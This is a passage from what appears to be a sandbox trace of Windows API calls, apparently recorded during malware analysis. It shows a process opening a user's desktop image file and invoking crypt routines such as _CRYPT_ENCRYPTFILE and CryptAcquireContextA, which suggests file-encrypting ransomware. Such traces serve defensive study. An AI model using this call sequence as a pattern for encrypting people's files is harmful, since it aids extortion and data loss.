CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caeb0 [0131.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caeb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0131.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0131.967] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0131.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0131.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0131.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0131.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0131.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0131.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0131.968] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\g6f-14R3g3sZGYbIp.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\g6f-14r3g3szgybip.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0131.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0131.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0131.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0131.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0131.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0131.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0131.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0131.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0131.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0131.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0131.970] FreeLibrary (hLibModule=0x772d0000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0131.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0131.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.972] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.972] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.972] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0131.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43925e0 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0131.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0131.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0131.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca9e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0131.974] CloseHandle (hObject=0x2a0) returned 1 [0131.975] FreeLibrary (hLibModule=0x772d0000) returned 1 [0131.975] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0131.975] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\g6f-14R3g3sZGYbIp.jpg", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918ea820, ftCreationTime.dwHighDateTime=0x1d5e45b, ftLastAccessTime.dwLowDateTime=0x4b543b90, ftLastAccessTime.dwHighDateTime=0x1d5ef19, ftLastWriteTime.dwLowDateTime=0x4b543b90, ftLastWriteTime.dwHighDateTime=0x1d5ef19, nFileSizeHigh=0x0, nFileSizeLow=0x17606, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="g6f-14R3g3sZGYbIp.jpg", cAlternateFileName="G6F-14~1.JPG")) returned 0x41ac280 [0131.975] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0131.975] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0131.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0131.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ee8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0131.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0131.976] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0131.976] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0131.976] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0131.976] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0131.976] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0131.976] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.976] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0132.100] TranslateMessage (lpMsg=0x144eb54) returned 0 [0132.100] DispatchMessageW 